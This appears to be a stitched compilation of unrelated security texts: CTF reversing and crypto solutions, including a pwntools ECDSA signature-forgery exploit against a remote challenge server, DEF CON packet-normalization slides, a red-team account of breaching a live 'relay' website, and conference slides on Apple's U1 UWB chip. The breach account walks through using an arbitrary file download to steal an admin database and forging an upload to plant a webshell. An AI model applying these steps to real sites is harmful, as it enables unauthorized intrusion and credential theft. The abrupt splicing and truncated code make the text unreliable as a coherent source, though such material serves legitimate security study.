cmp nand(nand(nand(nand(input0,-99),nand(98,~input0)),-8),nand(7,~nand(nand(input0,-99),nand(98,~input0))))
0
cmp nand(nand(nand(nand(input0,-99),nand(98,~input0)),-9),nand(8,~nand(nand(input0,-99),nand(98,~input0))))
0
cmp nand(nand(nand(nand(input0,-99),nand(98,~input0)),-10),nand(9,~nand(nand(input0,-99),nand(98,~input0))))
0
Presumably each comparison is a check on input0, and the numbers it uses are exactly the ones from the table extracted earlier.
By the flag format, input0 should be 'd'; the corresponding (result, index) pairs are:
(6, 0)
(7, 1)
(4, 2)
(5, 3)
(2, 4)
(3, 5)
(0, 6)
(1, 7)
(14, 8)
(15, 9)
If we let t0 = nand(nand(input0,-99),nand(98,~input0)),
then this mysterious comparison can be read as testing whether t0 is a digit (0-9).
Presumably the value produced by fun(a, b) has to land in the 0-9 range.
Simplifying the first expression by this rule gives:
~nand(nand(nand(t3,-9),nand(8,~t3)),2147483647)
which, by testing, simply compares t3 against 8.
So the whole series of mysterious checks earlier can be read as (in)equality tests on the table values.
Extracting them and feeding them straight into z3 yields:
t[28] = 8
t[3] = 2
t[5] = 1
t[15] = 9
t[6] = 5
t[0] = 6
t[14] = 7
t[7] = 8
t[16] = 8
t[33] = 4
t[40] = 3
t[41] = 2
t[31] = 1
t[2] = 3
t[39] = 9
t[4] = 4
t[46] = 8
t[49] = 3
t[8] = 4
t[24] = 2
t[37] = 1
t[9] = 5
t[18] = 3
t[35] = 6
t[12] = 1
t[20] = 7
t[21] = 3
t[25] = 4
t[17] = 5
t[26] = 1
t[44] = 4
t[48] = 7
t[1] = 7
t[23] = 5
t[30] = 9
t[43] = 2
t[47] = 5
t[32] = 3
t[45] = 6
t[42] = 8
t[19] = 9
t[34] = 3
t[36] = 4
t[22] = 7
t[13] = 6
t[11] = 4
t[27] = 6
t[38] = 9
t[29] = 6
t[10] = 6
The flag can then be recovered byte by byte:
res = ''
en1 =[98, 52, 96, 118, 98, 122, 80, 118, 32, 53, 106, 82, 68, 98, 121, 93, 64, 64, 125, 89, 114, 121, 125, 105, 71, 122, 55, 54
for i in xrange(50):
for sinput in xrange(0,0x80):
if nand(nand(sinput,~en1[i]),nand(en1[i],~sinput)) == t[i]:
res += chr(sinput)
break
print(res)
Crypto
babyecc
#!/usr/bin/env sage
N = 45260503363096543257148754436078556651964647703211673455989123897551066957489
p, q = 136974486394291891696342702324169727113, 330430173928965171697344693604119928553
assert p * q == N
# Carmichael's theorem
A = 84095692866856349150465790161000714096047844577928036285412413565748251721 + euler_phi(pow(2, 253)) / 2
P = (44159955648066599253108832100718688457814511348998606527321393400875787217987,
41184996991123419479625482964987363317909362431622777407043171585119451045333)
Q = (8608321574287117012150053529115367767874584426773590102307533765044925731687,
42087968356933334075391403575576162703959415832753648600254008495577856485852)
A = A % N
F = Zmod(N)
B = F(P[1] ^ 2 - P[0] ^ 3 - A * P[0])
E = EllipticCurve(F, [A, B])
# Solve by isomorphism
Pk = E(P)
Qk = E(Q)
Fp = GF(p)
Fq = GF(q)
Ep = EllipticCurve(Fp, [A, B])
Eq = EllipticCurve(Fq, [A, B])
Qp = Ep(Q)
Pp = Ep(P)
Qq = Eq(Q)
Pq = Eq(P)
a = Pp.discrete_log(Qp)
b = Pq.discrete_log(Qq)
op = Ep.order()
oq = Eq.order()
m = crt(a, b, op / gcd(op, oq), oq / gcd(op, oq))
print m, hex(m).decode('hex')
sign2win
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
from pwn import *
import ecdsa, hashlib, binascii, gmpy2, random, itertools, string
m1 = 'I want the flag'.encode()
m2 = 'I hate the flag'.encode()
curve = ecdsa.curves.SECP256k1
G = curve.generator
n = curve.order
hexlify = binascii.hexlify
# find a valid secret key
def H(m):
return int(binascii.hexlify(hashlib.sha256(m).digest()), 16)
z1 = H(m1)
z2 = H(m2)
k = random.randint(1, n - 1)
r = (G * k).x()
d = (((-(z1 + z2)) % n) * gmpy2.invert((2 * r) % n, n)) % n
sk = ecdsa.SigningKey.from_secret_exponent(d, curve, hashfunc=hashlib.sha256)
vk = sk.get_verifying_key()
assert (z1 + z2 + 2 * r * d) % n == 0
r0, s0 = ecdsa.util.sigdecode_string(sk.sign(m1, k=k), n)
r1, s1 = ecdsa.util.sigdecode_string(sk.sign(m2, k=k), n)
assert (-s1) % n == s0
pubkey = vk.to_string()
sig = sk.sign(m1, k=k)
context.log_level = 'DEBUG'
p = remote('129.226.163.141', 12233)
def PoW(chal, h):
for comb in itertools.product(string.ascii_letters + string.digits, repeat=4):
if hashlib.sha256((''.join(comb) + chal).encode('utf-8')).hexdigest() == h:
return ''.join(comb)
raise Exception("Not found")
p.recvuntil(b'XXXX+')
chal = p.recvuntil(')', drop=True).decode()
p.recvuntil(b' == ')
h = p.recvline().decode().strip()
w = PoW(chal, h)
p.recvuntil(b'XXXX:')
p.sendline(w.encode())
p.sendline(b'2')
p.recvuntil(b'encode)\n')
p.sendline(hexlify(pubkey))
p.sendline(b'5')
p.recvuntil(b'signature\n')
p.sendline(hexlify(sig))
p.recvuntil(b'signature\n')
p.sendline(hexlify(sig))
p.interactive()
Transformations
Defcon
21
IPv4
IP ID Randomization
  o Exclude Fragments
  o Others … Randomize and Clear Outgoing “DF”
TTL Standardized
  o Exclude ICMP Echo Requests and Routing Protocols (RIP, BGP)
  o Others … Accounting for Hops Already Traveled
  o Recalibrate for Maximum Allowed
ToS Cleared
ECN Cleared
IPv6
Hop Limit Standardized
  o Exclude ICMP Echo Requests and Routing Protocols (RIP, BGP)
  o Others … Accounting for Hops Already Traveled
  o Recalibrate for Maximum Allowed
Traffic Class Cleared
TCP
Discard Aberrant Flag Combinations (Enforce Strict “RFC” for all TCP flag combinations)
  o “Null”
  o “Christmas Tree”
  o SYN, FIN, ACK
  o Etc …
TCP Option Standardization
  o Parameters – MSS, Window, SACK, and MD5 Only
  o Values – Original
  o Order – MSS, Window, SACK, and MD5 (if present)
  o Padding – NOP till the end of original length
URG Flag and URG Pointer Cleared
Taking Down a Relay Site via Arbitrary File Download

In this hands-on engagement, information gathering was the crucial first phase: collect as much intelligence as possible about the target website or host. There are two approaches:

Active collection visits the site directly — scanning and analyzing the IP's open ports, the CMS, middleware, sensitive directories, sensitive files, script types, domains referenced in JS, and the operating system.

Passive collection relies on public channels without interacting with the target directly — for example, pulling the site's URIs from search engines, the domains bound to the IP, the surrounding C-class range, domain whois records, and other assets tied to the same certificate.

A few handy tricks:

1) Exploit the case-sensitivity difference between Windows and Linux: change part of the path to uppercase when requesting it, e.g. https://www.aaa.com/upload/index.php → www.aaa.com/upload/index.PHP.
If the page still loads normally, it is Windows; if it errors, it is Linux — Windows filenames are case-insensitive, while Linux distinguishes case.

2) In Chrome's F12 devtools, check Network --> header --> Server; for example, Server: nginx/1.20.1 tells you it is nginx.

3) To tell whether a site is PHP, JSP, ASP, or ASPX, inspect the URL, or lean on a Google dork: site:XXX filetype:asp|php|jsp|jspx|aspx
Port Scanning

For fast HTTP port sweeps use masscan, then nmap for service identification. Common ports:
21:"FTP",
22:"ssh",
25:"SMTP",
80:"web",
139:"Samba",
143:"IMAP",
161:"SNMP",
389:"LDAP directory access protocol",
443:"https",
445:"Microsoft SMB",
465:"SMTP SSL",
513:"rlogin",
546:"DHCP failover",
873:"rsync",
993:"IMAPS",
1080:"socks proxy",
1194:"OpenVPN",
1352:"Lotus domino",
1433:"MSSQL",
1521:"Oracle default",
2049:"Nfs",
2181:"ZooKeeper",
2375:"Docker",
3306:"MySQL",
3389:"Remote Desktop",
4440:"rundeck",
4848:"GlassFish控制台",
5000:"SysBase/DB2",
5432:"PostgreSQL",
5632:"pcanywhere",
5900:"vnc",
5984:"Apache CouchDB",
6082:"varnish",
6984:"Apache CouchDB SSL",
6379:"Redis",
7001:"weblogic server listen port",
7002:"Server Listen SSL Port",
8069:"zabbix",
8080:"web,jboss,tomcat etc..",
8089:"Jboss/Tomcat/Resin",
8083:"influxDB Web admin",
8086:"influxdb HTTP API",
8095:"Atlassian Crowd",
8161:"activemq",
8888:"Jupyter Notebook",
8983:"solr",
9000:"fastcgi",
9043:"VMware ESXI vsphere",
9080:"websphere http",
9083:"Hive default",
9090:"websphere admin",
9200:"Elsaticsearch http",
9300:"Elsaticsearch Node1",
10000:"HiveServer2",
11211:"memcached",
27017:"MongoDB",
28017:"MongoDB web page",
50000:"SAP command excute",
50060:"hadoop web",
50070:"hadoop default",
60000:"HBase Master",
60010:"hbase.master.info.bindAddress",
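The table above can drive the scan directly. A small helper sketch (the masscan/nmap flags shown are the common ones; tune --rate for your link, and extend the port dictionary as needed):

```python
# A trimmed copy of the port table above; extend as needed.
COMMON_PORTS = {21: "FTP", 22: "ssh", 25: "SMTP", 80: "web", 443: "https",
                3306: "MySQL", 3389: "Remote Desktop", 6379: "Redis"}

def scan_commands(target):
    """Build a fast masscan sweep plus an nmap service-identification pass."""
    ports = ",".join(str(p) for p in sorted(COMMON_PORTS))
    return [
        "masscan %s -p%s --rate 1000" % (target, ports),  # fast open-port sweep
        "nmap -sV -p %s %s" % (ports, target),            # service identification
    ]

for cmd in scan_commands("192.0.2.10"):
    print(cmd)
```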
Arbitrary File Download

The sensitive information of interest is mainly the admin directory, backup files, the upload directory path, and install pages, plus leaks such as phpinfo files and management components like phpMyAdmin. Google hacking syntax is a great help in digging up such leads.

In this engagement, a PDF download link was found on an ASP page; rewriting it to a relative path allowed downloading arbitrary ASP files:

Directory scanning produced the admin backend URI admin/index.asp.

From the backend's index.asp we learned the configuration file's location — the login page has to run a SQL query for the admin credentials, so it references the database configuration file.

The ASP site used an MDB database with no anti-download protection in place; using the arbitrary-download bug to fetch the .mdb database file hands us the administrator password stored inside it.
Arbitrary File Upload

With admin/index.asp obtained, I had already gone through the HTML page and every ASP file referenced in its A-tag attributes, and found a file-upload module. Following the link showed only a single input box, but the page source revealed hidden attributes on the input tags — the fields still show up when intercepting the request. Combining this with the arbitrary-download bug to read the upload module's ASP source, we can craft the upload request ourselves and drop a webshell without ever entering the backend.

Below is part of the upload code, with irrelevant parts omitted for clarity:

<form action="upload.asp" method="post" enctype="multipart/form-data" name="form1">
<input type="file" name="file">
<input type="submit" name="Submit" value="submit">
</form>
To understand the upload flow, first understand the structure of the POST body the HTML form sends:

1) Part one (start boundary)
-----------------------------7dc18645076a
2) Part two (file description)
Content-Disposition: form-data; name="file1"; filename="E:\1111.jpg"
Content-Type: application/msword
3) Part three (file content)
the file's binary content, omitted
4) Part four (end boundary)
-----------------------------7dc18645076a
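The four parts can also be assembled programmatically. A sketch (the boundary and field names here mirror the captured packet; on a real target they must be taken from its own form):

```python
def build_multipart(filename, content,
                    boundary="---------------------------7dc18645076a"):
    """Assemble a multipart/form-data body: start boundary, file
    description, file content, end boundary."""
    head = ("--{b}\r\n"
            'Content-Disposition: form-data; name="file1"; filename="{f}"\r\n'
            "Content-Type: application/msword\r\n"
            "\r\n").format(b=boundary, f=filename).encode()
    tail = "\r\n--{b}--\r\n".format(b=boundary).encode()
    return head + content + tail

body = build_multipart("shell.asp", b'<% Response.Write("ok") %>')
print(body.decode())
```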
The ASP code, annotated:

Dim filesize, filedata, PostData
' filesize is the size of the uploaded file
filesize = Request.TotalBytes
' bytArray holds the raw binary of the uploaded file
bytArray = Request.BinaryRead(filesize)
' use a RecordSet to convert the binary stream into text
Set rstTemp = Server.CreateObject("ADODB.Recordset")
rstTemp.Fields.Append "bytArray", adLongVarChar, lenb(bytArray)
rstTemp.Open
rstTemp.AddNew
rstTemp.Fields("bytArray").AppendChunk bytArray
rstTemp.Update
' we have getted the original string
strByteToString = rstTemp("bytArray")
Set rstTemp=Nothing
..... remaining code omitted .....
' extract the binary file content
strInputContent = Mid(strByteToString, lngStartPos, InStr(lngStartPos, strByteToString, strIDInput) - 2 - lngStartPos)
..... remaining code omitted .....
' save the file content
Set fso = CreateObject("Scripting.FileSystemObject")
Set tf = fso.CreateTextFile(withName , True)
if Err.number = 0 then
tf.Write(pContent)
tf.Close
end if

Based on these fields we can reconstruct the HTML form, then intercept and modify the request content and filename. The upload path is hard-coded in a variable inside the ASP upload module.
A Small Homemade Extension

Checking Google results manually also works. Plenty of public scraper utilities exist, but in recent years — as Google's anti-scraping measures and page markup kept changing — most stopped being maintained. Since the goal is just to harvest Google results, executing JavaScript statements in the browser is more convenient. I wrote a crude Chrome extension; grabbing Google search results looks like this:

Core JavaScript code:
var s = document.getElementById("search");
var r = s.getElementsByTagName("div");
var d = r[0].getElementsByTagName("div");
var e = d[0].getElementsByClassName("g"); //g
var str = '\n';
console.log(str);
for(var i=0;i< e.length;i++)
{
var g = e[i].getElementsByTagName("div");
var f = g[0].getElementsByTagName("div");
var x = f[0].getElementsByTagName("div");
str = str + x[0].getElementsByTagName('a')[0].href + '\n';
}
console.log(str);
ASP is rather dated — it's a mystery why so many sites still run it. I'm sharing this write-up as a retrospective; there are awkward sentences and some heavily redacted spots, both to protect the community and to protect myself. Please bear with me.

Meanwhile, you are welcome to follow the "公鸡队之家" (Rooster Team Home) knowledge planet — a professional, cutting-edge, original, law-abiding red-team/blue-team community: no spam posts, no link dumping, no ads or recruiting, just pure technical sharing and exchange, so we can all improve together.
Past Posts

Field story 1: Countering a phishing site via a privilege-escalation bug
Field story 2: Countering a relay site via file upload
References
https://www.cnblogs.com/liuxianan/p/chrome‐plugin‐develop.html
https://developer.chrome.com/extensions/content_scripts
Wibbly Wobbly, Timey Wimey
What's Really Inside Apple's U1 Chip
Jiska Classen
Secure Mobile Networking Lab - SEEMOO
Technical University of Darmstadt, Germany
Alexander Heinrich
Secure Mobile Networking Lab - SEEMOO
Technical University of Darmstadt, Germany
Ultra Wideband (UWB) U1 Chip
Nobody knows what
it is or does
Only available in the latest
generation of devices
Must be
hacker-proof!
Non-interceptable with
cheap SDRs
UWB Secure Ranging & NLOS Distance Measurement
Line of sight distance
<3 meters, open door.
Strongest path is non
line of sight… #?$%!
UWB Secure Ranging & NLOS Distance Measurement
For more details, see WiSec 2021 paper “Security Analysis of IEEE 802.15.4z/HRP UWB Time-of-Flight Distance Measurement” by Singh et. al.
Somewhat
UWB Features
Nearby Interaction
Find My
UWB to X
UWB to X
UWB Internals
UWB System Architecture
AirDrop
UWB Beaconing
+
AirDrop Protocol
AirDrop Bluetooth Discovery
Length
AirDrop
Zero padding
Version
Hash #1
Hash #2
Hash #3
Hash #4
Random non-resolvable
MAC address
Stute et al. (2019). A Billion Open Interfaces for Eve and Mallory: MitM, DoS, and Tracking Attacks on iOS and macOS Through Apple Wireless Direct Link.
Celosia et al. (2020). Discontinued Privacy: Personal Data Leaks in Apple Bluetooth-Low-Energy Continuity Protocol
05 12 00000000 00000000 01 ac5b d44e a87b dafe 00
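As an illustration, the advertisement above can be unpacked field by field. The layout follows the slide's annotations and the cited reverse-engineering papers (the type/length reading is an inference from that work, not Apple documentation):

```python
import struct

def parse_airdrop_adv(payload):
    """Split an AirDrop Continuity TLV into its annotated fields:
    type (0x05 = AirDrop), length, 8 bytes zero padding, version,
    four 2-byte truncated contact-identifier hashes, trailing zero."""
    msg_type, length = payload[0], payload[1]
    assert msg_type == 0x05 and length == len(payload) - 2
    body = payload[2:]
    version = body[8]                     # after 8 bytes of zero padding
    hashes = [struct.unpack_from(">H", body, 9 + 2 * i)[0] for i in range(4)]
    return version, hashes

adv = bytes.fromhex("0512" + "00" * 8 + "01" + "ac5b" + "d44e" + "a87b" + "dafe" + "00")
v, hs = parse_airdrop_adv(adv)
print(v, [hex(h) for h in hs])  # 1 ['0xac5b', '0xd44e', '0xa87b', '0xdafe']
```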
UWB Bluetooth Discovery
0f 05 a0 35 eed4de
Length
Authentication tag
Action Type: Point To Share
Action Flags
Nearby Action
Random resolvable MAC
address
Martin et al. (2019). Handoff All Your Privacy – A Review of Apple’s Bluetooth Low Energy Continuity Protocol
Celosia et al. (2020). Discontinued Privacy: Personal Data Leaks in Apple Bluetooth-Low-Energy Continuity Protocol
UWB Bluetooth Discovery
0f 05 a0 35 eed4de
sharingd
✅ Nearby device detected
✅ UWB Point To Share
MAC address
Authentication Tag Validation
0f 05 a0 35 eed4de
sharingd
✅ Nearby device detected
✅ UWB Point To Share
✅ Validate Auth Tag
MAC address
SipHash( , IRK) = Auth Tag
MAC address
UWB Bluetooth Discovery
0f 05 a0 35 eed4de
sharingd
✅ Nearby device detected
✅ UWB Point To Share
✅ Validate Auth Tag
MAC address
nearbyd
MAC address
Initiate ranging
Whitelist UWB MAC
address
rapportd
U1
AirDrop Ranging
UWB Ranging and Angle
measurements
AirDrop Ranging
UWB Ranging and Angle
measurements
Nearby Interaction Framework
Using out of band
communication
Initiator
Responder
Bluetooth discovery
13 04 01 a2b246
13 09 09 219d0c01 0400030c
Length
UWB
Authentication Tag
UWB Config
Authentication Tag
Initiator
Responder
Flags
NIDiscoveryToken
Identity Resolving Key (IRK)
Identifier Data
16 bytes
3 bytes
SipHash( , IRK) = Auth Tag
MAC address
UWB Secure Ranging
Somewhat
UWB Ranging
Time received
Time replied
Time of flight = (round-trip time − (time replied − time received)) / 2
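In numbers, a single-sided two-way-ranging sketch (illustrative values only; the one-way time of flight is half of the round trip minus the responder's turnaround, and multiplying by the speed of light gives distance):

```python
C = 299_702_547.0  # approximate speed of light in air, m/s

def ssr_distance(t_poll_tx, t_resp_rx, t_turnaround):
    """Single-sided two-way ranging: subtract the responder's processing
    (turnaround) time from the round trip, halve it, convert to meters."""
    tof = ((t_resp_rx - t_poll_tx) - t_turnaround) / 2.0
    return tof * C

# a ~10 m target: one-way flight ~33.36 ns, responder turnaround 1 ms
d = ssr_distance(0.0, 1e-3 + 2 * 33.36e-9, 1e-3)
print(round(d, 2))  # 10.0
```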
Sniffing UWB frames
nearbyd[1184] <Notice>: Built GR packet: {
ses_role: 0
, tx_ant_mask : 2
, rx_ant_mask : 11
, rx_sync_search_ant_mask : 2
, tx_preamble: 3
, rx_preamble: 3
, tx_pkt_type: 0
, rx_pkt_type: 0
, tx_mslot_sz_250us: 12
, rx_mslot_sz_250us: 12
, interval_min_ms: 30
, naccess_slots_min: 1
, naccess_slots_max: 32
, access_slot_idx: 0
, start_channel: 1
, alternate_channel: 0
, channel_hop_pattern_mask: 8
, debug_flags: 7
, start_time: 0
, start_time_uncertainty: 0
, interval_max_ms: 5000
, local_addr: 0x0
, peer_addr: 0x0
, sts_blob: 1281711291571851042031941281011261981431306684
}
Supported preambles codes for 64MHz pulse
repetition frequency
Channel 5: [9, 10, 11, 12]
Channel 9: [9, 10, 11, 12]
Channels supported by U1
[5, 9]
The Right Hardware
The Correct Configuration
Configuration:
Channel
9
Preamble code
12
Start of frame delimiter
likely 802.15.4z-2020
STS format
?
STS length
?
UWB Frame format
Preamble
SFD
SFD = Start of frame delimiter
STS
PHY header
PHY payload
Variable length
STS
PHY header
PHY payload
Variable length
Preamble
SFD
STS
PHY header
PHY payload
Variable length
STS
PHY header
PHY payload
Variable length
Preamble
SFD
STS
PHY header
Variable length
STS
Variable length
Issues
AirDrop
Nearby Interaction
One-to-many ranging
Peer-to-peer ranging
Single sided ranging
Double sided ranging
Likely no STS
Shared secret and STS
AoA and Distance Measurement Ticket Processing
nearbyd
IOKit
RoseControllerLib
Start range and angle estimation
NewServiceRequest
(once)
Rose neural engine sensor fusion
MeasurementTicket
(asynchronous, n times)
U1
Hardware
Interaction
Hardware Components
Application
Processor
~1500 functions, 32-bit RTKit
Digital Signal
Processor
~500 functions, 64-bit RTKit
U1
Rx
Tx
Always-on
Processor
64-bit RTKit
Kernel
💤💤💤 UWBCommsRoute: AP/AOP
Hardware Components - AirTag
Application
Processor
32-bit RTKit
Digital Signal
Processor
64-bit RTKit
U1
Rx
Tx
AirTag Firmware,
BLE+NFC
32-bit, non-RTKit
nRF52832
“Hacking the Apple AirTags”, DEF CON 29 talk by Thomas Roth.
RTKit Operating System
●
RTKitOS runs on almost every Apple chip or embedded device.
○
64-bit variant comes with ASLR.
○
Lightweight, ~100 functions.
○
Even logging is implemented differently in every RTKitOS firmware.
●
RTKitOS debug builds support additional logging.
○
U1 debug builds: iOS 13.3 on iPhone 11 & initial AirTag firmware 🎉
More details about RTKitOS in Apple’s Bluetooth chip and peripherals are documented in Dennis Heinze’s thesis (https://github.com/seemoo-lab/toothpicker).
Duplicate User Clients
Kernel
AppleSPURoseDriverUserClient
AppleSPUUserClient
Kernel Space
Always-on Processor
Hardware
rose
rose-supervisor
IOKit UserClients for RTKit-based chips have equivalents in the AOP.
Same principle for other wireless chips by Apple, e.g., the audioOS AOP implements
marconi-bluetooth and aop-marconi-bt-control to communicate with Apple’s Bluetooth chip.
RTBuddy
RTKit-based chips communicate with an RTBuddy for logging etc.
IOKit
User Space
nearbyd
Apps
Checking RTKit-based Driver Dependencies
# ioreg -rtc IOUserClient
+-o Root <class IORegistryEntry, id 0x100000100, retain 184>
+-o N104AP <class IOPlatformExpertDevice, id 0x10000020f, … >
+-o AppleARMPE <class AppleARMPE, id 0x100000210, … >
+-o arm-io@10F00000 <class IOPlatformDevice, id 0x100000118, … >
… +-o RTBuddyV2 <class RTBuddyV2, id 0x100000374, … >
+-o AOPEndpoint17 <class RTBuddyEndpointService, id 0x1000003a0, … >
+-o AppleSPU@10000014 <class AppleSPU, id 0x1000003dc, … >
+-o rose <class AppleSPUAppInterface, id 0x100000142, … >
+-o AppleSPURoseDriver <class AppleSPURoseDriver, id 0x1000004e4… >
+-o AppleSPURoseDriverUserClient <class AppleSPURoseDriverUserClient, id 0x100000aa3, … >
{
"IOUserClientCreator" = "pid 549, nearbyd"
}
…
+-o AppleSPU@10000020 <class AppleSPU, id 0x1000003e2, … >
+-o rose-supervisor <class AppleSPUHIDInterface, id 0x10000049e, … >
+-o AppleSPUUserClient <class AppleSPUUserClient, id 0x100000aa4, … >
{
"IOUserClientCreator" = "pid 549, nearbyd"
"IOUserClientDefaultLocking" = Yes
}
Find detailed ioreg outputs from current devices on https://github.com/robre/ioreg-archive.
Sending Commands directly to Rose
Kernel Space
Hardware
User Space
nearbyd
Я
IOConnectCallMethod(port, 5, …)
extRoseTx
AppleSPURoseDriverUsCli
The IOKit RoseDriverUserClient exports various functions, but in the end they call
AppleSPUInterface::spuPerformCommand(…) within the kernel, similar to the SPUUserClient.
AppleSPURoseDriverUserClient::extRoseTx(‘0504…’)
AppleSPURoseDriver::performCommand(…)
AppleSPUInterface::PerformCommand(…)
AppleSPUInterface::spuPerformCommand(…)
Raw command, reverse byte order,
means 0x4005.
Command forwarding.
hsi_cmd()
case 0x4005:
…
Always-on Processor
U1 Application Processor
0 extRoseLoadFirmware
1 extRoseGetInfo
2 extRoseReset
3 extRoseEnterCommandMode
4 extRosePing
5 extRoseTx
6 extRoseTimeSync
7 extRoseGetSyncedTime
8 extRoseGetProperty
9 extRoseSetProperty
10 extRosePerformInternalCommand
11 extRoseCacheFirmwareLogs
12 extRoseDequeueFirmwareLogs
13 extRoseTriggerCoredump
14 extRoseDequeueCoredump
15 extRoseCoredumpInfo
16 extRosePowerOn
17 extRoseReadPowerState
18 extRoseConfigureFirmwareLogCache
Sending Commands via the AOP to Rose
Kernel Space
Hardware
User Space
nearbyd
Я
IOConnectCallMethod(port, 1, …)
extSetPropertyMethod
AppleSPUUserClient
AOPRoseSupervisor::setProperty
AOPRoseServiceHandle::SendCommandFIFO
(0x4012, mac_addr, … )
Always-on Processor
mac_cmd()
case 0x4012:
…
U1 Application Processor
The IOKit SPUUserClient sets states and properties in the AOP.
If needed, certain state changes also apply commands to the U1 chip.
AppleSPUUserClient::extSetPropertyMethod(211, ‘0000’ + bd_addr)
…
AppleSPUInterface::spuPerformCommand(…)
R1MacAddress
Concatenate from Bluetooth Address
208 SPMISettings
209 UWBCommsRoute
210 BeaconWhiteList
211 R1MacAddress
212 AllowR1Sleep
213 CalDataPushed
214 CmdQueueClearAllow
215 LogVerbose
216 RoseAOPHello
0 extTestMethod
1 extSetPropertyMethod
2 extGetPropertyMethod
3 extPerformCommandMethod
4 extSetNamedPropertyMethod
5 extGetNamedPropertyMethod
Sending Commands via the AOP to Rose
Kernel Space
Hardware
User Space
nearbyd
Я
IOConnectCallMethod(port, 3, …)
extPerformCommandMethod
AppleSPUUserClient
AOPRoseServiceHandle::AOPGeneralizedRangingJob
Always-on Processor
mac_cmd()
case 0x4025:
…
U1 Application Processor
AppleSPUUserClient::extPerformCommandMethod(‘!’, parameters)
…
AppleSPUInterface::spuPerformCommand(…)
NewServiceRequest
Optional raw parameters
RosePassthrough
! NewServiceRequest
" TriggerRangingStart
# TriggerRangingStop
$ CancelServiceRequest
% HelloCommand
& GetPowerStats
‘ ResetJobs
( APCheckIn
) APGoodbye
* ActivateTimeSync
+ UpdateSessionData
. EmulatedRosePacket
/ EmulatedBTData
Demo: Frida script that decodes interaction
-> NewServiceRequest etc.
GR Packet to Initiate Secure Ranging
nearbyd[1184] <Notice>: RoseScheduler::handleNewServiceRequestInternal
nearbyd[1184] <Notice>: [AP Scheduler] Servicing dequeued service request.
Passing message to AOP scheduler.
nearbyd[1184] <Notice>: Request: [Role]: Initiator, [MacMode]: GR
nearbyd[1184] <Notice>: Built GR packet: {
ses_role: 0
, tx_ant_mask : 2
, rx_ant_mask : 11
, rx_sync_search_ant_mask : 2
, tx_preamble: 3
, rx_preamble: 3
, tx_pkt_type: 0
, rx_pkt_type: 0
, tx_mslot_sz_250us: 12
, rx_mslot_sz_250us: 12
, interval_min_ms: 30
, naccess_slots_min: 1
, naccess_slots_max: 32
, access_slot_idx: 0
, start_channel: 1
, alternate_channel: 0
, channel_hop_pattern_mask: 8
, debug_flags: 7
, start_time: 0
, start_time_uncertainty: 0
, interval_max_ms: 5000
, local_addr: 0x0
, peer_addr: 0x0
, sts_blob: 1281711291571851042031941281011261981431306684
}
- AppleSPUUserClient::extPerformCommandMethod()
> connection 0xa503
> selector 0x3
> input
v
0 1 2 3 4 5 6 7 8 9 A B C D E F 0123456789ABCDEF
00000000 21 !
+ NewServiceRequest
v---- IOKit input struct ----
0 1 2 3 4 5 6 7 8 9 A B C D E F 0123456789ABCDEF
00000000 30 00 16 00 00 00 04 00 01 13 01 02 00 00 00 00 0...............
00000010 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00000020 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00000030 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00000040 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00000050 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00000060 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00000070 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00000080 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00000090 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
000000a0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
000000b0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
000000c0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
000000d0 00 00 00 00 25 40 00 00 00 00 01 04 02 0b 02 01 ....%@..........
000000e0 00 08 03 03 00 00 00 00 00 00 0c 0c 00 00 1e 00 ................
000000f0 88 13 01 20 ff 80 ab 81 9d b9 68 cb c2 80 65 7e ... ......h...e~
00000100 c6 8f 82 42 54 00 00 00 00 00 07 00 00 00 00 00 ...BT...........
00000110 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00000120 00 00 00 00 00 00 00 00 ........
0x80=128, 0xab=171, …, 0x54=84
Firmware Format
U1 Firmware Extraction
Contained in every iOS/audioOS IPSW, watchOS OTA image, or AirTag firmware
image.
/Firmware/Rose/[type]/ftab.bin
Types as of now:
●
iPhone 11 (r1p0)
●
iPhone 12 (r1p1)
●
Apple Watch 6 (r1w0)
●
HomePod mini (r1hp0)
●
AirTag (b389)
The ftab format is also used for other firmware, split it using https://gist.github.com/matteyeux/c1018765a51bcac838e26f8e49c6e9ce.
00000000 01 00 00 00 ff ff ff ff 00 00 00 00 00 00 00 00 ................
00000010 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00000020 72 6b 6f 73 66 74 61 62 03 00 00 00 00 00 00 00 rkosftab........
00000030 72 6b 6f 73 60 00 00 00 e0 98 04 00 00 00 00 00 rkos`...........
00000040 73 62 64 31 40 99 04 00 60 39 04 00 00 00 00 00 sbd1@...`9......
00000050 62 76 65 72 a0 d2 08 00 26 00 00 00 00 00 00 00 bver....&.......
…
000786b0 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 00 ............ ...
000786c0 52 54 4b 69 74 5f 69 4f 53 2d 31 32 36 34 2e 36 RTKit_iOS-1264.6
000786d0 30 2e 36 2e 30 2e 31 2e 64 65 62 75 67 00 00 00 0.6.0.1.debug...
000786e0 06 00 00 80 04 00 00 00 00 00 00 00 00 00 00 00 ................
000786f0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
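A minimal parser sketch for this container, with the layout inferred from the hex dump above (magic at 0x20, an entry count, then 16-byte entries of tag/offset/size; the meaning of the header before 0x20 and the fourth entry word are assumptions):

```python
import struct

def parse_ftab(blob):
    """Split an ftab.bin into its named segments (e.g. rkos, sbd1, bver)."""
    assert blob[0x20:0x28] == b"rkosftab"
    count = struct.unpack_from("<I", blob, 0x28)[0]
    segments = {}
    for i in range(count):
        tag, offset, size, _pad = struct.unpack_from("<4sIII", blob, 0x30 + 16 * i)
        segments[tag.decode()] = blob[offset:offset + size]
    return segments

# usage: parse_ftab(open("ftab.bin", "rb").read())["bver"] -> RTKit version string
```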
Firmware Segments
Application
Processor
~1500 functions, 32-bit RTKit
Digital Signal
Processor
~500 functions, 64-bit RTKit
